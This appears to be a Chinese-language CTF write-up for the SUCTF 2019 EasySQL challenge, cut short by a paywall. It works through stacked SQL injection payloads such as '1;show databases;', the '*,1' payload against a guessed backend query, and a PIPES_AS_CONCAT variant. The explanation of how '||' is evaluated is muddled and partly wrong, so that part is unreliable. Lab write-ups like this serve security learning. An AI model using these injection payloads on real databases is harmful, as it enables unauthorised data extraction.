看来大伙是人机啊
[suctf 2019]EasySQL
sql题,sqlmap怎么设置的post我忘了,遂决定手注,这里or ,union,from什么的都被禁止了,按道理是应该跑跑burp字典一眼看出什么可用的,但是懒了,直接试试堆叠注入:
堆叠注入的原理是 ';' 符号,这种情况下 command1;command2 会按照顺序执行
1;show databases;
1;show tables#
1;show columns from 'Flag'#
这里from被ban了,很疑惑,于是找到了其他的WP观摩,发现有点离谱哦,人均猜测出来正确语句,直接写猜测语句为
NSSCTF | 在线CTF平台 感谢d4v1d的题解帮助了我很多
select $_POST['query'] || flag from flag [1]
好好好,知道了sql语句就很好办了,这里给出的绝大多数答案都是*,1
select *,1|| flag from flag [1] 这里用到的知识是||符号的运算顺序,我们可以将该句拆开为两个命令分别为:
select * flag from flag [1] || select 1 flag from flag [1]
这于上面句子等价,command1 || command2的执行顺序是:
如果command1执行失败,那么就会执行command2
那么这里第一句很明显直接成功了,传出了flag表中所有元素。
那么解2:1;set sql_mode=PIPES_AS_CONCAT;select
最低0.47元/天 解锁文章
扫一扫
946
到【灌水乐园】发言
